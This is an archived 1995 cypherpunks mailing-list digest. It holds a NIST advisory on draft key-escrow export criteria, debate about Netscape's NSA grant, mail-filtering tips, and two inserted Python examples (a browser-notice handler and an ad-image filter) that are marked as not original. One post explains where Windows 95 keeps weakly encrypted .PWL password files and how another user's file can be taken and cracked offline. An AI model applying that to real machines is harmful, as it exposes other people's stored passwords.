From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 2 Dec 1995 03:12:21 +0800
To: cypherpunks@toad.com
Subject: Media Advisory: GAK on Dec 5
Message-ID: <199512011626.RAA14939@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Reposted for background on the Netscape $5m IOUNSA for its 
insecure future:


Note that Messrs. Clark and Andreessen can't sell their stock 
until two years post IPO.


------------------

Nov. 6, 1995
Contact:  Anne Enright Shepherd
(301) 975-4858
anne.shepherd@nist.gov


                         MEDIA ADVISORY
          
            U.S. GOVERNMENT SEEKS PUBLIC COMMENT ON
                                
        DRAFT EXPORT CRITERIA FOR KEY ESCROW ENCRYPTION


      Revised proposed export criteria for software encryption 
products using a key  escrow mechanism are now available for 
public review. Public comment will be solicited  at a Dec. 5 
meeting to be held at the Commerce Department's National 
Institute of  Standards and Technology.


     Key escrow encryption is part of the Clinton 
Administration's initiative to promote  the use of strong 
techniques to protect the privacy of data and voice 
transmissions by  companies, government agencies and others 
without compromising the government's  ability to carry out 
lawful electronic surveillance and to execute search warrants 
for  electronically stored communications. The exportability 
criteria being proposed are for  an expedited licensing review 
process for software key escrow encryption products with  keys 
up to 64 bits long.


     The U.S. Interagency Working Group on Encryption and 
Telecommunications, a  body that develops recommendations on 
Administration encryption policies, solicits  additional public 
comment on the revised criteria.
  

     Since the Clinton Administration's Aug. 17, 1995, 
announcement of proposed  liberalization of export control 
procedures for key escrow software products with key  lengths 
up to 64 bits, the working group has met with representatives 
of computer  hardware and software manufacturers, industry 
trade associations and others interested  in providing strong 
security for electronic data and transmissions. Based on 
comments  received to date from industry, the criteria have 
been revised to better reflect  commercial interests while 
balancing the needs of law enforcement and national  security.


     These criteria do not replace or supersede any other 
licensing processes or  criteria. Export applications for other 
types of products will use the existing licensing  process.


     The Dec. 5 meeting, to be held from 9 a.m. to 5 p.m. at 
NIST in Gaithersburg,  Md., is free and open to the public. 
Representatives from the interagency encryption  working group 
will discuss the draft criteria and answer related questions. 


     Those interested in attending the workshop can register 
before Nov. 30 by  sending their name, organization, postal 
address, phone, fax number and e-mail  address to Elaine Frye 
of NIST by fax: (301) 948-1784 or e-mail: elaine.frye@nist.gov. 
 For additional information, call (301) 975-2819.


     Once public comments are received and the export criteria 
are given any  necessary clarifications, the Department of 
State is expected to issue guidance  incorporating the criteria 
in early 1996. Products will be reviewed by the State  
Department to verify that they satisfy the final criteria. 
Products meeting the criteria will  be transferred to the 
Commodity Control List administered by the Commerce  
Department's Bureau of Export Administration, where they can be 
exported under a  general license.


The revised proposed export criteria are available on the World 
Wide Web at  http://csrc.ncsl.nist.gov/keyescrow/. Reporters 
may also request a copy from Anne
Enright Shepherd at NIST, (301) 975-2762, fax: (301) 926-1630, 
or e-mail:  anne.shepherd@nist.gov.


-------------------


                        Meeting Announcement

     Draft 64-bit Software Key Escrow Encryption Export Criteria


On December 5, 1995, the Commerce Department's National 
Institute of Standards and  Technology (NIST) will sponsor a 
meeting to discuss proposed exportability criteria (11/95  
version) for 64-bit software key escrow encryption.  This 
meeting continues the industry-  government dialog of an 
earlier NIST-sponsored meeting held in September.  At that 
meeting,  officials of the U.S. Interagency Working Group on 
Encryption and Telecommunications  (IWG/ET) met with industry 
representatives and other interested parties to discuss an 
initial draft  of these criteria.  In response to comments 
received, the criteria have been revised with the intent  of 
achieving commercial acceptance within the flexibility 
permitted by law enforcement and  national security 
constraints.  


Changes to the proposed criteria have been made, and a new 
draft is now available for public  review and comment. 


At the upcoming meeting, representatives from the IWG/ET will 
discuss the draft criteria and  answer related questions.  Time 
will follow for industry representatives and other interested 
parties  to comment on the criteria.  Also, breakout sessions 
will be held to discuss each criterion in  greater detail.  At 
a minimum, Government representatives are scheduled to attend 
from the Office of Science and Technology Policy, National 
Security Council, the U.S. Department of State, the  U.S. 
Department of Justice, the U.S. Department of Commerce, the 
National Security Agency,  and the Federal Bureau of 
Investigation.


The meeting will be held on Tuesday, December 5, 1995 from 9:00 
a.m. to 5:00 p.m. at NIST in  Gaithersburg, Maryland in the Red 
Auditorium of the Administration Building.  Please register via 
 e-mail (to "elaine.frye@nist.gov") or via fax (301-948-1784) 
before November 30, 1995.  To  register, please provide: 1) 
your name, 2) organization, 3) postal address, 4) phone, 5) fax 
number  and 6) e-mail address.  Alternatively, walk-up 
registration will be available on-site the day of the  meeting. 
 


Directions from Washington, DC: from the Beltway (I-495) take 
I-270 North to Exit 10 (Clopper  Road).  At the first traffic 
light (Bureau Drive), turn left into the main entrance to NIST. 
 Follow  signs to the Administration Building parking lot.  The 
receptionist at the entrance to the  Administration Building 
can provide directions to the Red Auditorium.  


If you would like to make a presentation with your comments on 
the proposed criteria, you are  asked to contact Elaine Frye at 
NIST via e-mail at "elaine.frye@nist.gov" or via telephone on 
301-  975-2819 by November 30, 1995.  The number of 
presentations as well as their length may be  limited.  
Presenters (and others wishing to distribute material) are 
asked to bring 250 (attendance  estimate) copies of their 
presentations to the meeting.


-----------------


        Draft Software Key Escrow Encryption Export Criteria
                          (11/95 version)


Export control jurisdiction for a software key escrow 
encryption  product that meets the following criteria, as 
determined by the  U.S. Department of State after a one-time 
review, will be  transferred to the U.S. Department of Commerce 
for export  licensing.  These criteria do not alter existing 
licensing  practices applicable to other encryption products or 
modes. Vendors must still submit other encryption to the U.S. 
Department  of State for review and export licensing, or 
jurisdiction  transfer as appropriate.  Vendors contemplating 
the development  of encryption products are encouraged to 
discuss their export  objectives with the U.S. Government.


Key Escrow Feature


1.    The key(s) required to decrypt the product's key escrow
      cryptographic functions' ciphertext shall be accessible
      through a key escrow feature.


2.    The product's key escrow cryptographic functions shall be
      inoperable until the key(s) is escrowed in accordance with
      #3.


3.    The product's key escrow cryptographic functions' key(s)
      shall be escrowed with escrow agent(s) certified by the U.S.
      Government, or certified by foreign governments with which
      the U.S. Government has formal agreements consistent with
      U.S. law enforcement and national security requirements.


4.    The product's key escrow cryptographic functions' ciphertext
      shall contain, in an accessible format and with a reasonable
      frequency, the identity of the key escrow agent(s) and
      information sufficient for the escrow agent(s) to identify
      the key(s) required to decrypt the ciphertext.


5.    The product's key escrow feature shall allow access to the
      key(s) needed to decrypt the product's ciphertext regardless
      of whether the product generated or received the ciphertext.


6.    The product's key escrow feature shall allow for the
      recovery of multiple decryption keys during the period of
      authorized access without requiring repeated presentations
      of the access authorization to the key escrow agent(s).


Key Length Feature


7.    The product's key escrow cryptographic functions shall use
      an unclassified encryption algorithm with a key length not
      to exceed sixty-four (64) bits.


8.    The product's key escrow cryptographic functions shall not
      provide the feature of multiple encryption (e.g.,
      triple-DES).


Interoperability Feature


9.    The product's key escrow cryptographic functions shall
      interoperate only with key escrow cryptographic functions in
      products that meet these criteria, and shall not
      interoperate with the cryptographic functions of a product
      whose key escrow encryption function has been altered,
      bypassed, disabled, or otherwise rendered inoperative.


Design, Implementation, and Operational Assurance


10.   The product shall be resistant to anything that could
      disable or circumvent the attributes described in #1 through
      #9.


------------------


                        Background Paper

      Changes to the Criteria Based on Earlier Public Input


The government presented draft criteria (9/95 version) for the
export of software-based key escrow encryption at an open 
meeting  at NIST on September 6-7, 1995.  Meeting participants 
suggested  several changes to the criteria; the government 
re-drafted the  criteria as described below.  Industry's ideas 
and words were  included when possible and given serious 
consideration consistent  with the protection of fundamental 
interests (e.g., privacy and  national security).


General changes to the document: The document was re-structured 
 to make it clearer.  After the introductory text, related  
criteria are grouped into the following categories:


          a.   key escrow feature

          b.   key length feature

          c.   interoperability feature

          d.   assurances


Changes to the introductory text: The wording has been 
clarified,  and additional words have been included to 
encourage vendors that  are considering building non-escrowed 
encryption products to  discuss their export objectives with 
the government.


Changes to the criteria: The criteria presented at the 
September  6-7 meeting have been modified in the following 
ways:


Old Criterion 1.    Moved to #7; wording clarified.


Old Criterion 2.    Moved to #8; wording clarified.


Old Criterion 3.    Split into #1 and #2 since the original
                    criterion had two major points in it (the
                    requirements for key escrow, and the
                    requirement on when the keys are first
                    escrowed); wording clarified.


Old Criterion 4.    Wording clarified; the notion of
                    accessibility to authorized entities was
                    modified to explicitly state that the
                    required information must be available with
                    a reasonable frequency.


Old Criterion 5.    Moved to #10; wording clarified, and the
                    example was deleted so that implementors
                    were not misled to believe that the example
                    given was the only way of satisfying that
                    requirement.


Old Criterion 6.    Moved to #9; wording clarified, and
                    applicability of this requirement was
                    scoped to address interoperability between a
                    product's key escrow mode and a non-key
                    escrow product.


Old Criterion 7.    Moved to #5; wording clarified.


Old Criterion 8.    Moved to #6; wording clarified because the
                    term "repeated involvement" was perceived
                    as being too broad.


Old Criterion 9.    Deleted.


Old Criterion 10.   Moved to #3; wording clarified, and
                    requirement modified to not preclude the
                    escrow of key by agents in addition to
                    those required by these criteria.


Note:   The September (and November) version of the criteria is
available electronically at:

"http://csrc.ncsl.nist.gov/keyescrow/"



*****************************************************  

Elaine Frye
Computer Systems Laboratory, NIST
Bldg. 225/Rm.B154
Gaithersburg, MD  20899-0001
Voice:   301/975-2819    Fax:  301/948-1784

*****************************************************









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 2 Dec 1995 09:23:19 +0800
To: cypherpunks@toad.com
Subject: A "Warning Banner" for Netscape Navigator? Good idea!
Message-ID: <ace4d9270f0210047e2d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:16 PM 12/1/95, Brian Davis wrote:

>And thus we return to my original point, which is that it will depend on
>what is said/disclosed.  If every copy of GAKscape had a banner, bigger
>than the Netscape "N" which said, "The government can read every message
>you send using this software no matter what you do" then I think
>consumers will be hard pressed to say they weren't warned.

I agree with this.

In fact, I think it's an excellent argument for providing this in Netscape.
Seriously. A version of Netscape with such warning banners (exact wording
to be determined, but probably mentioning limited key lengths, GAK, etc.)
would be a Good Thing.

And if Netscape Communications will not release their products in such a
way, some alternatives may exist. Maybe:

1. A patch that adds this, analogous to the patches that alter the Netscape
logo.

2. An entirely patched new version.

Good idea, Brian!

One patch I'd pay money to have is one which intercepts the "commercials"
Netscape blasts out at us and replaces them with something else (maybe
nothing, maybe a "quote for the day," maybe something from a
user-selectable file of items).

I understand that Netscape is collecting money for these "commercials," and
that they control what is sent out. So, any such patch to intercept/remove
these commercials would have to be done locally. Can this be done?

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Sat, 2 Dec 1995 08:07:50 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Barring access to Netscape, a step better
In-Reply-To: <Pine.SOL.3.91.951201002746.2186B-100000@chivalry>
Message-ID: <Pine.LNX.3.91.951201173320.21765D-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


> The field is User-Agent. However, blocking access to users of Navigator 
> isn't a particularly useful thing to do. If you must do something, why 
> not modify your GET handler to add a header to the start of all html 
> pages informing people of the problem, and suggesting alternatives. 

Great idea! I'm sure there is a cyberpunk on this list willing to write a 
patch to NCSA HTTPd to get the job done, in a configurable manner of 
course so that a template.html would be 'inserted' at the top of every 
document sent out to the specified browser. Any takers?
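
[Added example, not part of the original post and not code from NCSA HTTPd or any other server named in this thread.] A sketch of the User-Agent handler discussed above, covering both the notice inserted at the top of each document and the "sorry" page variant from the earlier CGI suggestion. The names build_response, is_navigator, NOTICE_TEMPLATE and SORRY_PAGE are hypothetical and the sample User-Agent strings are constructed; because the header is supplied by the client, this only selects which page to show and is not an access control.

```python
import html
import re

# Constructed sample User-Agent strings for the demo (not taken from the thread).
SAMPLE_AGENTS = {
    "navigator": "Mozilla/1.1N (X11; I; Linux 1.2.13 i486)",
    "msie": "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)",
    "lynx": "Lynx/2.4.2 libwww/2.14",
}

# Hypothetical stand-ins for the template.html and "sorry" page in the posts.
NOTICE_TEMPLATE = "<p><b>Notice:</b> {text}</p>\n"
SORRY_PAGE = "<html><body><h1>Sorry</h1>\n{notice}</body></html>\n"

_PRODUCT = re.compile(r"^\s*([^/\s]+)/\S+")        # leading "Name/version" token
_COMMENT = re.compile(r"\(([^)]*)\)")              # first "(...)" comment
_BODY_TAG = re.compile(r"<body\b[^>]*>", re.IGNORECASE)


def is_navigator(user_agent):
    """Best-effort match on a client-supplied header.

    True when the leading product token is "Mozilla" and the comment does
    not declare the client "compatible" (other browsers reuse the Mozilla
    token for compatibility). A missing or empty header never matches.
    """
    if not user_agent:
        return False
    product = _PRODUCT.match(user_agent)
    if not product or product.group(1).lower() != "mozilla":
        return False
    comment = _COMMENT.search(user_agent)
    if comment and "compatible" in comment.group(1).lower():
        return False
    return True


def build_response(environ, document, notice_text, block=False):
    """Return (status, headers, body) for one request.

    environ is a CGI-style mapping; only HTTP_USER_AGENT is read.
    block=False: matching browsers get the document with the notice added.
    block=True:  matching browsers get the "sorry" page instead.
    """
    # Vary tells shared caches that the body depends on User-Agent, so a
    # cached copy with the notice is not replayed to other browsers.
    headers = [("Content-Type", "text/html"), ("Vary", "User-Agent")]
    if not is_navigator(environ.get("HTTP_USER_AGENT")):
        return "200 OK", headers, document

    # Escape the notice text so it cannot inject markup into the page.
    notice = NOTICE_TEMPLATE.format(text=html.escape(notice_text))
    if block:
        return "403 Forbidden", headers, SORRY_PAGE.format(notice=notice)

    # Put the notice right after <body ...> when there is one, so the
    # result stays valid HTML; otherwise prepend it to the document.
    body_tag = _BODY_TAG.search(document)
    if body_tag:
        cut = body_tag.end()
        body = document[:cut] + "\n" + notice + document[cut:]
    else:
        body = notice + document
    return "200 OK", headers, body


if __name__ == "__main__":
    import os

    status, headers, body = build_response(
        dict(os.environ),
        "<html><body><h1>Hello</h1></body></html>",
        "This server has a message for users of your browser.",
    )
    print("Status: " + status)
    for name, value in headers:
        print(name + ": " + value)
    print()
    print(body)
```
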




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 2 Dec 1995 08:48:01 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: (fwd) Re: SKIP domestic Source release is available
Message-ID: <199512012250.RAA20268@homeport.org>
MIME-Version: 1.0
Content-Type: text


	A while ago, someone was asking after Sun Microsystems-Russian
crypto connections.  This tidbit was in sci.crypt, in a message with
Message-ID: <DIwxqo.7zu@ipmce.su>.  www.elvis.ru/english/portrait.html
has some on the Sun-Elvis connection.

Adam

>AFAIK, an international version of SKIP was developed in Russia, in
>Sun partner Elvis+. Check www.elvis.ru. I believe one may this
>implementation of SKIP outside of U.S., for example in Russia.


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Syed Yusuf <yusuf921@uidaho.edu>
Date: Sat, 2 Dec 1995 10:35:40 +0800
To: "Beavis B. Thoopit" <beavis@bioanalytical.com>
Subject: Re: available news/mail filtering
In-Reply-To: <199512012001.PAA01825@bioanalytical.com>
Message-ID: <Pine.HPP.3.91.951201175410.1752A-100000@harrier.csrv.uidaho.edu>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 1 Dec 1995, Beavis B. Thoopit wrote:

> What news and mail filter programs are available?  Pointers
> will be appreciated.

I use procmail in a .procmailrc through my .forward 

--
Syed Yusuf <yusuf921@uidaho.edu> |   http://www.uidaho.edu/~yusuf921 
Keep me away from Wisdom that does not Cry, Philosophy that does not Laugh, 
and Greatness that does not bow before Children
                                                 --Kalil Gibran





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 103155.2774@compuserve.com
Date: Sun, 3 Dec 1995 11:16:40 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199512012300.SAA25794@arl-mail-svc-1.compuserve.com>
MIME-Version: 1.0
Content-Type: text/plain



Hello...i'm new to this, but love it...Tell me how exciting this is!!!!!/// 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sat, 2 Dec 1995 09:04:44 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: nsa and netscape
In-Reply-To: <199512011553.JAA12735@spirit.sctc.com>
Message-ID: <199512012304.SAA22488@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Bob Bruen writes:
# At yesterday's FNC  (Federal Networking Council) meeting it was 
# mentioned in passing that NSA has given Netscape a grant of $5 Million 
# (yes $5M) to beef up the security features of Netscape. More info will 
# be forthcoming on this.

david d `zoo' zuhn writes:
> FORTEZZA support is virtually required for any sort of new network
> authentication within the US DoD.  
> 
> The DoD pie is rather large, and I don't blame Netscape for trying to get
> a piece of it.  One can support FORTEZZA without giving in to GAK for
> non-FORTEZZA users.

For the moment I am inclined to agree that there's nothing terribly sinister
about this. I've just been flipping through
<a href="http://www.fnc.gov/fisp_sec_contents.html">the FNC's draft Federal 
Internet Security Plan (FISP)</a>. In particular it mentions:

------------
4.2 Internet Security Technology Development



     The IETF and other activities are currently expanding their efforts to
     develop and deploy technology standards to meet the growing security 
     needs of the Internet. However, these efforts must be accelerated and 
     facilitated by Government, since the Government has as much, if not
     more, interest in increasing the level of security capability in the 
     Internet as does any other segment of society.
[...]
Enhance Internet Application Security

     A number of key Internet applications have become central to agencies' 
     increasing Internet activities. Such key applications should be examined
     and, where appropriate, strengthened to the extent possible. Among the 
     applications that require high-priority attention are the following:
[...]
     Public Information Servers - Second only to email is the expanding use of
     Internet-based public information server methods, most visibly the World 
     Wide Web and the associated Mosaic/Linx client applications. 
     Unfortunately, there are a number of known security vulnerabilities 
     associated with the use of these applications.
----------------

I definitely do _not_ get a sense from anything in this document that 
installing GAK mechanisms is a major concern of the project. The NSA appears
to have a few people involved with the FNC, but not a great visible presence.

-Futplex <futplex@pseudonym.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 2 Dec 1995 10:43:45 +0800
To: Laszlo Vecsey <master@internexus.net>
Subject: Re: Windows95 "Security"
In-Reply-To: <Pine.LNX.3.91.951201201911.32274A-100000@micro.internexus.net>
Message-ID: <Pine.ULT.3.91.951201175232.2911G-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Dec 1995, Laszlo Vecsey wrote:

> Where is the password data file kept?

A separate password file is kept for each "user" in:

  C:\WINDOWS\*.PWL

.PWL files are weakly encrypted with the "default login" password. Once 
you decrypt them, they contain cleartext passwords for every other 
password-protected resource accessed by that user (network servers, 
screen savers, dial-up networking, possibly .PWL-enabled encryption 
utilities).

Somebody supposedly posted code for decrypting .PWL files to sci.crypt.

.PWL files are persistent, i.e., Joe "logs on," saves a couple passwords, 
"logs off," then Judy comes by, hits Escape or various other trivial 
tricks to avoid the need to "log on," picks up Joe's .PWL file, and 
cracks it at her leisure.

Each "user" also gets an unencrypted "profile" that gives all application
preferences. 

Anyone who treats Win95 as if it were a multiuser system is an idiot.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 2 Dec 1995 09:11:11 +0800
To: JonathanZ@consensus.com (Jonathan Zamick)
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <v02120d00ace510ca1c12@[157.22.240.13]>
Message-ID: <199512012319.SAA20311@homeport.org>
MIME-Version: 1.0
Content-Type: text


Jonathan Zamick wrote:
| > Brian Davis wrote:
| >If they tell you about it and you buy it anyway -- tough luck.
| >
| >
| >Same with the cars.  Would *you* buy Pinto with explosives in it????
| >(leaving aside the "inherently dangerous" argument for the moment on the
| >products liability claim).
| >
| >EBD
| 
| Hmm. The key point is that almost no general users will have a clue what
| actual security is, and what GAK is. They _might_ understand the risks of
| having an explosive in their vehicle (but can just as easily argue it wasn't
| properly designed if it went off improperly.) Regardless of what they'd know
| about their vehicle, they can easily claim to have had the risks associated with
| GAK improperly represented, Netscape misleading them with deceptive claims
| of security given this potential hole etc.

	I'd just like to add one bit to what Jonathan said here.  That
is the AT&T Clipper phones don't come with 'Big Brother Inside'
stickers on them.  The phrase 'key escrow' is not used in the manual
(near as I remember.)  The disclaimer is in very small print.

	It's not a reasonable expectation that a product being touted
as 'secure' is known to its makers to be insecure.  Expecting John Q.
Public to know that without warning labels seems like a stretch.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 2 Dec 1995 09:12:35 +0800
To: beavis@bioanalytical.com (Beavis B. Thoopit)
Subject: Re: available news/mail filtering
In-Reply-To: <199512012001.PAA01825@bioanalytical.com>
Message-ID: <199512012326.SAA20363@homeport.org>
MIME-Version: 1.0
Content-Type: text


Beavis B. Thoopit wrote:

| What news and mail filter programs are available?  Pointers
| will be appreciated.

I like procmail.  It's a steep learning curve, but well worth the
effort.

ftp.informatik.rwth-aachen.de:/pub/packages/procmail/procmail.tar.gz 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Sat, 2 Dec 1995 11:08:23 +0800
To: cypherpunks@toad.com
Subject: Filtering Net Commercials
Message-ID: <199512020237.SAA03409@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


On December 1, Timothy C. May wrote:

> One patch I'd pay money to have is one which intercepts the "commercials"
> Netscape blasts out at us and replaces them with something else (maybe
> nothing, maybe a "quote for the day," maybe something from a
> user-selectable file of items).
>
> I understand that Netscape is collecting money for these "commercials," and
> that they control what is sent out. So, any such patch to intercept/remove
> these commercials would have to be done locally. Can this be done?

This is from a post to cypherpunks back in September.  Given the current
situation, maybe a re-posting is in order.  (If not, flames to my address
please, the list has enough to worry about.)  I just checked, it's still
at the ucsb.edu site.

- - - Begin forwarded message - - -

On the subject of HTTP proxies, 

[SEVERAL FWD'S DELETED, ENTERTAINING SUBJECTS RETAINED]

Subject: The agents/advertising arms race heats up
Subject: OH YEAH BABY, FILTER ME HARDER

>From: Axel Boldt <boldt@math.ucsb.edu>
>Newsgroups: comp.infosystems.www.announce
>Subject: SOFTWARE: Filtering ads out of popular web sites
>Organization: Univ of California at Santa Barbara, Dept of Mathematics
>Approved: www-announce@boutell.com
>Message-ID: <44ercn$nhl@holly.aa.net>

Several popular web sites have recently turned to putting advertising
gifs on their pages. NoShit is a tool that filters these out so that
you don't see them - in fact, you don't even download them in the
first place, thus saving time, money and brain capacity.

NoShit is implemented as a set of patches against Cern httpd to turn
it into a "filtering proxy server". This means that the proxy
maintains a list of URL templates together with corresponding filter
scripts. When a document is requested from the proxy that matches one
of the templates, then the page is piped through the corresponding
script before being presented to the client. This works together with
caching, if desired.

The idea is to run your own personalized NoShit proxy server and point
your browser to it. The proxy does the filtering; the browser doesn't
even know about it. This scheme works with every browser.

I have written a ready-to-use library of filter scripts for a couple
of well known, ad-infected sites, including Yahoo, Lycos, Netscape,
HotWired, CNN, Infoseek and NandO Times. You can change these or add
your own very easily.

Locations:
            <URL:http://math-www.uni-paderborn.de/~axel/NoShit/>
                (Germany)
    
            <URL:http://emile.math.ucsb.edu:8000/~boldt/NoShit/>
                (California)

Enjoy,
  Axel

- - - End forwarded message - - -

-- 
Jeff Simmons                           jsimmons@goblin.punk.net
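
The URL-template and filter-script dispatch described in the forwarded announcement above, as an added example that is not part of the original post and is not NoShit's code. The host names, templates, function names and sample page are all hypothetical and constructed for illustration.

```python
import fnmatch
import re
from urllib.parse import urljoin, urlsplit

# Matches a whole <img ...> tag and, inside it, the value of its src attribute.
IMG_TAG = re.compile(r"<img\b[^>]*>", re.IGNORECASE)
SRC_ATTR = re.compile(
    r"""(?<![\w-])src\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.IGNORECASE
)


def strip_images_matching(*path_globs):
    """Build a filter that deletes <img> tags whose resolved path matches a glob.

    Because the tag is removed before the page reaches the browser, the
    browser never issues the request for the image at all.
    """
    def page_filter(page_url, html):
        def replace(match):
            tag = match.group(0)
            src = SRC_ATTR.search(tag)
            if src is None:
                return tag  # no src attribute: leave the tag alone
            value = next(g for g in src.groups() if g is not None)
            # Resolve relative references against the page URL first, so
            # "img/x.gif" and "/img/x.gif" are compared in the same form.
            path = urlsplit(urljoin(page_url, value)).path
            if any(fnmatch.fnmatchcase(path, glob) for glob in path_globs):
                return ""
            return tag
        return IMG_TAG.sub(replace, html)
    return page_filter


# The proxy's table: URL template -> filter for pages matching it.
# Hypothetical hosts and paths; the first matching template wins.
FILTERS = [
    ("http://search.example/*", strip_images_matching("/ads/*", "*/banner*.gif")),
    ("http://news.example/*", strip_images_matching("/sponsor/*")),
]


def filter_page(page_url, html):
    """Pipe a fetched page through the filter registered for its URL, if any."""
    for template, page_filter in FILTERS:
        if fnmatch.fnmatchcase(page_url, template):
            return page_filter(page_url, html)
    return html  # no template matched: pass the page through untouched


# Constructed sample page, not taken from any real site.
SAMPLE_URL = "http://search.example/index.html"
SAMPLE_HTML = (
    "<h1>Search</h1>\n"
    '<a href="/click?id=7"><IMG SRC="/ads/widget.gif" ALT="Buy"></a>\n'
    '<img src="logo.gif" alt="logo">\n'
    "<img src='img/banner42.gif'>\n"
)

if __name__ == "__main__":
    print(filter_page(SAMPLE_URL, SAMPLE_HTML))
```
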




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Sat, 2 Dec 1995 11:02:39 +0800
To: wiltship@iccu6.ipswich.gil.com.au (PeterWiltshire)
Subject: Re: Talking to Jim
In-Reply-To: <199512012310.KAA23844@iccu6.ipswich.gil.com.au>
Message-ID: <199512020156.SAA15123@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



> I emailed Jim Clark day before yesterday about his comments re key escrow.
> He responded.  

Woah. What a radical idea.

Have any of the people busily working away at web pages slamming Netscape
actually bothered to verify that Jim Clark actually said any of the things
he is rumored to have said? I haven't seen any documentation of anything
from what I would consider to be a reliable source. 

If you want to generate publicity about something, you better make damn
sure your facts are correct, or you'll end up looking like an idiot. 
Complaining that Clark didn't deny it isn't good enough.

                                    -- Will





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Sat, 2 Dec 1995 09:22:41 +0800
To: cypherpunks@toad.com
Subject: Cyberspace Inc & Robber Baron Age
Message-ID: <Pine.BSD.3.91.951201190005.6599C-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
11 29 95 Computer underground Digest carries the complete text 
of Rick Moore's article, 
 
        Cyberspace Inc and the Robber Baron Age, 
          an analysis of PFF's "Magna Carta" 
 
scheduled to appear in the print journal, The Information Soci- 
ety. 
 
Here's a sample: 
 
 Instead of an infrastructure for public communications -- like 
 the current Internet, or the American highway system -- cyber- 
 space would be developed as a corporate owned monopoly -- 
 priced at whatever the traffic will bear. 
 
 Instead of providing a "space" in which citizens are free to 
 speak and associate (like Internet), cyberspace would become a 
 profit-machine and propaganda channel for media conglomerates. 
 
 PFF's manifesto is a formula for neo-feudalism in the "Know- 
 ledge Age" -- it is a charter for what could aptly be dubbed 
 "Cyberspace Inc".
 
 
The most recent issues of CuD can be obtained from 
 
            http://www.soci.niu.edu/~cudigest 
 
 
Cordially, 
 
Jim 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 2 Dec 1995 10:10:15 +0800
To: Eric Murray <ericm@lne.com>
Subject: Re: A "Warning Banner" for Netscape Navigator? Good idea!
Message-ID: <ace4ed99120210044bd6@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:22 AM 12/2/95, Eric Murray wrote:

>You can fix this from the browser.
>Pull down the 'Options' menu, grab the 'Window and Link styles'
>page, and change the default "home page location" from
>netscape's to whatever you want.  I usually use my own home page.
>I never look at Netscape's pages unless I specifically want to
>see something like SSL specs.  If there wasn't a way to
>turn off their home page I'd be pretty pissed off.

Oh, I don't have their home page enabled. What I meant, but perhaps wasn't
clear about in my post, is that the commercials pop up in Yahoo, Infoseek,
Deja News, Excite, and so forth. (OK, so it is inaccurate to say "Netscape"
puts them in.)

Some of the ads are intertwined with the command boxes of the particular
service, and thus may be hard to excise, but others seem to be separate.

Any ideas?

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Graeme Cross <graeme@chem2.chem.swin.edu.au>
Date: Sat, 2 Dec 1995 19:23:36 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Getting a copy of the Jim Clark speech
In-Reply-To: <199512010549.VAA27874@blob.best.net>
Message-ID: <Pine.SGI.3.90.951201190425.16326A-100000@chem2.chem.swin.edu.au>
